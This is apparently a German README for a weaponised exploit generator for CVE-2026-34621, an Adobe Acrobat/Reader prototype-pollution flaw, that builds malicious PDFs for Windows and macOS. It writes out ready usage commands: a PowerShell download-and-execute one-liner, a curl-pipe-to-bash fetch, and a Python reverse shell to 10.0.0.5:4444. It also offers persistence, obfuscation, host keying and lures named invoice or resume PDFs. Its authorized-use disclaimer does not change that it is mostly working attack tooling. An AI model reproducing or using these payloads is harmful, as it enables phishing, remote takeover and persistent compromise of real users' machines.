
Ein hochentwickelter, plattformübergreifender Exploit-Generator für **CVE-2026-34621** – eine kritische Prototype-Pollution-Schwachstelle in Adobe Acrobat und Reader, die zu Sandbox-Escape und beliebiger Codeausführung unter Windows und macOS führt.
Ein ausgefeilter, plattformübergreifender Exploit-Generator für CVE-2026-34621 – eine kritische Prototype-Pollution-Schwachstelle in Adobe Acrobat und Reader, die zu Sandbox-Escape und beliebiger Codeausführung unter Windows und macOS führt.
⚠️ WICHTIGER HINWEIS
Dieses Tool ist ausschließlich für autorisierte Sicherheitsforschung und Penetrationstests gedacht.
Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Testgenehmigung haben, ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.
CVE-2026-34621 ist eine Zero-Day-Schwachstelle in Adobe Acrobat und Reader, die es einem Angreifer ermöglicht:
Dieser Generator erstellt eine bösartige PDF-Datei, die beim Öffnen in einer verwundbaren Version von Adobe Reader automatisch eine auf das Betriebssystem des Opfers zugeschnittene Payload ausführt.
Unterstützte Zielplattformen:
| Kategorie | Fähigkeiten |
|---|---|
| Plattformübergreifende Payloads | Erkennt das Betriebssystem automatisch und wählt die geeignete Windows- oder macOS-Befehlsausführungsmethode. |
| Mehrere Ausführungsvektoren | cmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS). |
| Gestaffelte Payloads | Herunterladen und Ausführen von Second-Stage-Payloads von einer Remote-URL. |
| Persistenz | Installiert Registry-Run-Key (Windows) oder LaunchAgent (macOS). |
| Umgehungstechniken | Drei Stufen der JavaScript-Verschleierung, Umgebungs-Keying, Ausführungsverzögerungen, polymorpher Code. |
| PDF-Köder-Einbettung | Einbetten des Exploits in ein legitim aussehendes PDF (erfordert PyPDF2). |
| Mehrere Auslöser | OpenAction, Seitenöffnungsaktion oder JavaScript auf Dokumentebene. |
| Umfassende Berichte | HTML-, TXT- und JSON-Berichte mit Details zur Payload-Konfiguration. |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
Das Kernskript verwendet nur die Python-Standardbibliothek. Für die PDF-Köder-Zusammenführungsfunktion PyPDF2 installieren:
pip install PyPDF2
Ein einfaches PDF generieren, das unter Windows und macOS den Rechner öffnet:
python3 cve_2026_34621_advanced.py -o test.pdf
Dies erstellt:
test.pdf – Die bösartige PDF-Datei.
test_report.html – Detaillierter HTML-Bericht.
test_report.txt – Zusammenfassung im Klartext.
test_config.json – JSON-Konfigurationsexport.
Windows-Befehle
1-Szenario Befehl
A-Basis-calc.exe-Popup
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
PowerShell-Reverse-Shell
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
Gestaffelte Payload mit Persistenz
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
Umgebungs-Keying (nur auf "SALES-PC" ausführen)
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
Mit Verschleierungsstufe 2 und 10-Sekunden-Verzögerung
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
macOS-Befehle
2-Szenario Befehl
Rechner öffnen
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
Skript herunterladen und ausführen
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
Reverse-Shell über Python
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
Persistenz über LaunchAgent
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
Einbettung in ein Köder-PDF
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-Hinweis zu mobilen Tests
Das Skript selbst läuft auf dem Desktop (Windows/macOS/Linux), um das PDF zu generieren. Das generierte PDF kann auf Android- oder iOS-Geräten geöffnet werden, aber:
Mobile Versionen von Adobe Acrobat Reader sind nicht anfällig für CVE-2026-34621.
Die Payload löst einen harmlosen Demo-Fallback aus (öffnet eine URL oder zeigt einen Hinweis), anstatt Systembefehle auszuführen.
Option Beschreibung
-o, --output DATEI Erforderlich. Name der Ausgabe-PDF-Datei.
--win BEFEHL Windows-Befehl zur Ausführung (Standard: calc.exe).
--mac BEFEHL macOS-Befehl zur Ausführung (Standard: open /System/Applications/Calculator.app).
--stage URL URL zum Herunterladen der Second-Stage-Payload.
-p, --persistence Persistenzmechanismus installieren (Registry/LaunchAgent).
-O, --obfuscate STUFE JavaScript-Verschleierungsstufe (0=keine, 1=grundlegend, 2=mittel, 3=fortgeschritten).
-d, --delay SEKUNDEN Ausführung um angegebene Sekunden verzögern.
-k, --key HOSTNAME Umgebungs-Keying – nur bei passendem Hostnamen ausführen.
-l, --lure PDF Pfad zu einem legitimen PDF als Köder (führt Exploit zusammen).
--trigger TYP Auslöser-Vektor: openaction, pageopen oder doclevel.
--no-reports Generierung von HTML/TXT/JSON-Berichten überspringen.
--seed N Zufallsseed für reproduzierbare polymorphe Generierung festlegen.
Angriffskette
Prototype-Pollution:
Das eingebettete JavaScript modifiziert Object.prototype, um bösartige Eigenschaften (__trusted, privileged usw.) zu injizieren. Dies verwirrt die Vertrauensgrenze der Adobe-JavaScript-Engine.
Kontext-Eskalation
Aufgrund des verschmutzten Prototypes behandelt die Engine nicht vertrauenswürdiges Dokument-JavaScript fälschlicherweise so, als würde es in einem privilegierten Kontext ausgeführt.
Zugriff auf privilegierte APIs
Das Skript kann nun eingeschränkte APIs wie app.launchURL, util.readFileIntoStream und app.trustedFunction aufrufen.
Sandbox-Escape
Diese APIs ermöglichen Dateisystemzugriff und Prozessausführung außerhalb der Adobe-Sandbox.
Beliebige Codeausführung
Das Skript führt den Befehl des Angreifers mit betriebssystemspezifischen Methoden aus:
Windows: cmd.exe /c, PowerShell oder WScript.Shell.